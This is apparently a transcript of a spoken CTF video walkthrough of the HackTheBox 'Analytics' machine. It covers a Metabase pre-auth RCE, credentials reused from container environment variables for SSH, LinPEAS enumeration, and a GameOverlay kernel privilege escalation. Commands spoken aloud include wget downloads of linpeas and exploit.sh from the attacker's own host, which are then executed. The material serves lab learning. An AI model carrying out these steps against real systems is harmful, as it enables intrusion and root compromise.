Hey, what's up, everyone? Welcome back to another episode of Naked CTF. I'm Jono from OpenLearnSec, and in Naked CTF, this is a series where I'm going to attempt to compromise and own a server from HackTheBox. This particular CTF exercise the first time. I've not solved the box beforehand. I've not seen or read anything about it. It's one take with no editing, and so this could take 30 minutes or 3 hours. And that would be my usual preamble, except in this case today, the recording broke. My OBS crashed while I was screen capturing this particular exercise. And I've just spent the last few minutes thinking about it. I could go and reset everything and clear all my history and everything else and pretend I was doing it from the start again. But I feel that's disingenuous. So what we're going to do is pick up where I'm at, which is I've currently got a foothold on the server. And I'm looking to figure out how to pivot that. So let me just spend a little bit of time recapping where we're at. Oh, goodness. So this one may or may not be a long one. I don't know yet. So let's just kill this and let's go. Okay, so to bring you up to speed where we're at, we're doing analytics. Which is a easy Linux box. It's been running for about 50 minutes. And what happened was, from my enumeration, is that we found port 22 and port 80 were open. So, usual kind of stuff, SSH and HTTP. HTTP was redirecting to analytical.htb. So we added that to our host file. That brought us to analytical.htb. Let's force that. HTTPS analytical.htb. And it gave us this website. This website was pretty plain and vanilla, nothing really interesting there. They're a company that does storage, analytics, and security. Went through this website, super static, nothing interesting at all about it. Found this link, log on. This was the only one that actually went anywhere. And this took us to data.analytical.htb. If we look at the source code for this page and we search for version, we can see here, whoops, the version number is actually present in the minified JavaScript here. So version 0.46.6. We prodded around and had a look. There was no default username, password, anything like that. So at this point, we did a search exploit for Metabase. We found a existing exploit POC for 0.466, so exactly the same version number. That was essentially a pre-auth RCE, so you don't need a user on Metabase, but you can issue you can actually do a pre-auth. And if I go back to here, this is what the shell looks like. So I'll just kill it here. Okay. So we run this exploit, and essentially it gives us something of a reverse shell, but it's not true reverse shell, because it's basically every time we send a command, it's doing some, formulating a payload to leverage the exploit, which gets executed by Metabase in a HTTP request, and then that request dies, right? So the bash shell that it spawns and everything else for the lifetime of that command is not persistent, if that makes sense. So what we did find in here is that there's a whole bunch of interesting environment variables. MetaPass and MetaUser is some credentials that we captured, but these are not standard environment variables. As in, they're not part of the default Metabase deployment, because Metabase just simply doesn't use meta_user, meta_pass. So the kind of the gut feel at the moment is that these are alternative credentials for something else. They're not credentials that you can use to log into Metabase itself, because it requires something in the format of an email address. So if we try and take the Metalytics user, appends the known domain, and then use this password, I'll just grab it here. That gives us a login. Okay. So that's kind of where we're at. What the other interesting thing that we did find was that this Metabase instance that we're exploiting is more than likely running inside a Docker container on the host, because a couple of clues, like the host name is 12 character hex. The IP address is not the IP address we're actually connecting to. It's a different address, so instead of 10.10, it's 172.17. It's running Alpine Linux, all this sort of stuff. So the thinking here is we've got a foothold within a Docker container running on the CTF host. But what do we do next? So we've got this login to Metabase now. We can browse data, sample database. What do we get out of it? I'm not sure. So we haven't, that's about where we're up to. So we're at this kind of checkpoint of, we've got a foothold. What do we want to do next? So meta user append at analytics.hdb. So it's metalytics at analytics.hdb. And password work for Metabase login. Now, one of the other things that I was about to do before I realized we weren't recording is try it using SSH. So we'll jump into here and we're going to do SSH metalytics at analytics.hdb at etc hosts. Oh, analytical, sorry. Let's update that. Analytical. So SSH responds. Let's try the password that we found in the environment variable. And that works. So now we can see that, yeah. Now we're on the parent host where the Docker VM that Metabase was running was present. So we've kind of pivoted a little bit. So we can say pivoted from Docker instance to parent host using meta pass user via SSH, which is cool. So I'm much more interested in this at the moment than what we can actually do in here, because this at the end of the day is like a BI tool. We already have a way to do remote command execution using an exploit. That's how we got these credentials in the first place. So what do we want to do next? I think we should proceed on the Metalytics user. So let's just have a poke around. Let's grab the user flag. So yeah, sorry you're joining a little bit late and missed the initial access and foothold. Whoops. Hey, what happened there? Okay. I'm going to just... What am I going to do? Just going to blank the screen for a moment while I log in. Just a sec. Just bear with me. Because I have to do some stuff that I would rather maintain my OPSEC. Just my luck that my session to Hack the Box logs out in the middle of a video. It's not going well this time. Okay, we're back, I think. All right, let's turn that back on. Very good. So, now we need to grab the host again. Analytical. Let's grab this key again. Hey. Analytics, not analytical. So many different spelling variations of analytics. So let's pop the user flag in there. This is definitely our host. It's still running. Okay. So now we want to do Privesc. So let's do some basic stuff. We don't have bash history. We'll kind of leave all that alone for now. Let's do sudo -l. Pop in our password again. Nope. Nope. Okay. What else do we want to do? We run docker ps. Sorry, docker ls. Docker. Yeah, docker ps. Oh, we need to run it as root. Okay, all right, ignore that. So, let's just do some basic checks. Let's have a look what other users might exist. So we got this Laurel user, but they're kind of non-interactive. They don't have a interactive shell. Everything else is all kind of system default stuff. Nothing super obvious. Okay. So at this point, I'm inclined to, in the interest of, look, I think I'll say at this point, my checklist of stuff to run through post initial access is bad. So I'm just going to go the easy, well, the kind of the lazy route and grab a copy of LinPs. Where's the releases? and see if that throws up anything like super obvious, right? So many CPU architectures now. I've got to think about it. So we want Linux, AMD 64. So let's get a local web server running. So we'll move to CTF HTTP X, copy from downloads, linpeas to here. So let's call it peas. And let's do python 3 -m http.server. And then here, let's move into a working directory wget http ://10.10.14.44 port 8000. Oh, port 8000 peas. chmod +x peas. And then I saw this for the Windows version of peas. I wonder if you can do it with this as well. I basically want to log the output to okay, we can just pipe it -a. So peas output peas.log. We'll give that a minute to run. And then maybe there'll be an obvious privesc, maybe not. If we need to, we can always jump into guided mode, look for some hints from there. And yeah, we can figure out what happens. But yeah, so the path to the foothold was pretty straightforward. Like, we didn't want to mess with SSH until we had some credentials. The website was super static. The redirect to data.analytical.hdb. We spent some time like researching Metabase. Like, I've already used it once or twice in the past. And I was able to confirm that like the version number that was present on in the web page source code matched up to the release numbers within like the Docker images and the jar files as well. So the kind of the packaged release versions had the same versioning scheme as the actual source code within GitHub, and that numbering scheme matched what we saw deployed on this Docker container. So it was good in that sense. Okay, let's make this bigger. Now, another problem that I always seem to have is not immediately finding the privesc vector within linpeas itself, because there's a lot of output. Okay, disks, great. Environment variables, okay. PWD is highlighted. Okay, so kernel exploits are always an option, but Usually unstable. These are all less probable, so low probability. Nothing that really kind of sticks out there. App armor. Well, we can't read it. Is this a virtual machine? Yes. Container. Yep. So Docker exists. Run C. Am I a container? No. Okay. Cloud. No. Okay, so that's identifying P's itself. And what else we got? Binary process permissions, non-root and not belonging to current user. Okay. Cron jobs all look fairly vanilla, as in their kind of default system ones. Here are some cron jobs run as root. So it's cron maintaining cron. .socket files. Okay, so one thing we can kind of keep in mind is, let's do this at our previous checkpoint. So nothing authoritative there. Active ports. So listening on the internet facing or VPN facing is port 80 and 22. We know about that. 127.00.53 is interesting. And then 127.00.13,000 is, I believe, part of Metabase itself. Like it's a locally bound like if we go back into the settings, there's a locally bound service. Yeah, okay. So that's the actual site URL. All right. And then we want, do I have PGP keys? No, nothing kind of in sudo. Super user, only one is root. Users with consoles, the Metalytics user and root. That's what we'd already kind of discovered. Groups. All fairly vanilla. Plus logons. Do not forget to execute sudo -l, which we've done. Correct. So Nginx sites available. So the front end was Nginx, right? Yeah, so Nginx is listing on 80, and then it's doing a rewrite into 127.0.0.1.3.000. So it's Nginx is kind of like the front end or the reverse proxy for, yeah, there it is. For the Metabase server itself. Yeah, there it is. Okay. And we might have seen, just out of interest, if we'd looked at the request response here, we might have seen let's see. Real IP there? No. X real IP. Okay. Nginx running as www data user. Fast CGI. Okay, some certs. They're all the CA certs. So root login. Container D, no, unc. So SUIDs. Check if the pseudo version is vulnerable. I doubt. Password. Yeah. There's nothing that looks extraordinarily non-standard there. Group ID. Unknown SGID binary. P's discovered itself. Modified in the last 5 minutes. Okay. Okay, let's keep looking. That's the end. So, no obvious prove-esque there. There was some stuff that was suggested that could be potentially abused. We do have netcat. Cool. All right, let's go back to here. I feel we didn't. I mean, we got the credentials from this environment variable, right? So this is the Docker container. I think we need a hint. 2. Data. Analytical.htb. Metabase. It was 0466. The 0.46.6. The CV itself was this one, CV 2023. This is the value of setup token used by this Metabase instance. Okay, that we didn't come across. Okay. Set. Setup token. So we're hunting around for this setup token. Nope. Nope. Okay. Kill. Opt. Why is that not working? Opt. Okay. Opt. Let's opt Java. Opt Java Open JDK. What was it? Yeah, so that's just JDK itself. Let's Google it. Metabase setup token. What is Metabase setup token? Okay. GitHub issue. You'll see the setup token in the console output for Metabase when you first launch. Setup token we retrieve from API session properties endpoint contains setup token key. So if we go to that, setup token. Okay, well, the hints are telling us that it's important, so I'm gonna save that. And then we can figure out what to do with it. Yeah, but we've already got pre-auth RCE, right? So where does setup token fit into this? I mean, is that what our exploit here is doing? Is fetching the setup token? Okay, so it looks like we jumped a little bit ahead with that. We jumped a little bit ahead with that Python exploit code, which is kind of automating some of these steps, which is to fetch the setup token, and then it is to post to API setup validate. Yeah, and that's where the kind of the injection happens, right? Yeah. Okay, so this is kind of a breakdown of the Python code that we've already got. So the API that it hits in order to actually do the RCE. Yeah. It's running as Metabase user, right? Yeah. Metabase. Metapass. So we made a lot of good progress. We submitted the flag. What kernel version is installed on the host system? Oh my goodness, don't tell me it's a kernel exploit. Like, I immediately discounted that because kernel exploits just notoriously crap, right? Well, not crap, but somewhat unreliable. So Linux exploit suggester is coming up with NFT object UAF required to obtain catnet admin. PwnKit I've heard of many times before. See, these are all saying less probable, right? And we've got 1, 2, 3, 4, 5, 6 suggested CVEs. So, you know, do we just try them one by one? Ubuntu version we did have before. Okay, that etc issue 22043. LTS. Wrong answer. Ubuntu 24 22.04.3 LTS, and there's a bunch of junk at the end there. Okay. Let's do this rather than trying to limp along with the hints. Ubuntu 22.04.3 kernel 62025. Let's just see if this is a bad combination. Game overlay. Local privesc Ubuntu kernels overlay fs. So was that in our P's log? Game overlay. Six two zero. Okay. Okay, so it looks like there's this simple exploit.sh. 2640. 2640. 2640 doesn't appear. 32629. 32629. Oops. $26.43.2629. So neither of those CVEs appear. Neither of these CVEs appear in this list of suggested exploits. But it looks like this actually combines two different, or chains two different CVEs. Okay, first things first. Let's get a copy of this. $620, yep. And so that matches, and cat etc issue 22043, 22043 Ubuntu 2204. Yeah, I mean it matches up, right? So run it. Okay. Well, let's try it. Let's downloads, good old exploit.sh, and then wget http://10.10.14.44 exploit.sh. Okay, chmod exploit chmod +x exploit.sh. You should be root now. Operation not permitted. Try it from here. Oi! It worked. So let's do the first things first and grab the flag. Okay, so the prove ask was nothing notable obvious in P's or from the P's. Combining kernel version plus Ubuntu release version turned up. Root shell obtained. So yeah, look, that's an interesting one. I guess, again, just relying on tools like Peas is not going to always give you what you're looking for. That game overlay seems to be only around 6 months old or something like that. The CV is quite recent. So it's Ubuntu kernels with this specific commit. An unprivileged user may set privileged extended attributes on the mounted files, leading to them to be set on the upper files without the appropriate security checks. It's like a range validation type thing. Yeah, okay. So look, a bit of a mess. This naked CTF missed the first half of actually getting a foothold on the server. And then we had to go to the hints in order to kind of get pointed in the right direction of what the prove-ask is. Yeah, again, I think it just goes back to the gaps in, if I kind of do a quick mental review, is that, you know, once I've got that initial foothold as a non-privileged user, I don't really have a good checklist of stuff to run through. And then I and R, and it's like, oh, should I run Ps? And then I run P, you know, spend 10 minutes getting Ps uploaded and executed, and another 10 minutes like pouring through the output, and there's no obvious P vector. So yeah, I think I'm going to go away and work on that for the next box. But it's it is what it is, and that's why the hints are there, is to try and point you in the right direction when you do get a little bit stuck. Yeah, it's I guess the other kind of thing to reminisce is there's no one tool or one pathway. It's not like Ps is always going to give you your it's not going to always point you in the right direction. So probably even without looking at the hints, I'll know now that if there's nothing obvious in Ps, then just start looking at some, go back to some basics, right? Like security issues for this particular Ubuntu version, whatever it might be. But yeah, it's been grand. I really enjoyed it. Apologies again for not getting the first half of the video, but that happens. So yeah, I'm a little bit mentally exhausted after that, but all said, it's been a lot of fun, and if you stuck around to the end of this video, thanks very much. I hope you have a great morning, evening, nighttime, whatever time it is for you, and I'll see you in the next video. Until then, goodbye.